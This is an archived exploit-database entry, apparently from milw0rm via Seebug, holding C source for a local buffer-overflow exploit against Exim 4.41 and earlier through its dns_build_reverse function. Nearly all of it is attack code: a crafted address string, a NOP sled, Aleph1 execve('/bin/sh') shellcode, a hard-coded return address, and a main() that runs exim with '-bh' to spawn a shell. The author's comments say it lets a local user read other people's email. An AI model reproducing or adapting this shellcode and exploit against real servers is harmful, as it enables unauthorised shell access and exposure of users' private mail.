Exim <= 4.41 dns_build_reverse Local Exploit

2014-07-0100:00:00
Root
www.seebug.org
JSON
No description provided by source.

                                                /* 
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 * 
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people&#39;s emails ....
 * 
 * not even my own shellcode. aleph1 shellcode - cut and paste job 
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 * 
 * 
 */

char bomb[288]=

/* the gear from iDEFENSE */
&#34;::%A:::::::::::::::::&#34;                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;
&#34;\x90\x90&#34;                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
&#34;\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89&#34;  /* 12 bytes  */
&#34;\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c&#34;  /* 12 bytes  */
&#34;\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80&#34;              /* 9 bytes   */
&#34;\xe8\xdc\xff\xff\xff/bin/sh&#34;                       /* 12 bytes  */

/* where EIP should point */
&#34;\xf4\xf2\xff\xbf&#34;;                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
main()
{
  char *exim[4];
  exim[0] = &#34;/usr/exim/bin/exim&#34;;
  exim[1] = &#34;-bh&#34;;
  exim[2] = bomb;
  exim[3] = 0x0;
  printf(&#34;Firing up exim - cross your fingers for shell!\n&#34;);
  execve(exim[0],exim,0x0);
  return;
}

// milw0rm.com [2005-05-25]
JSON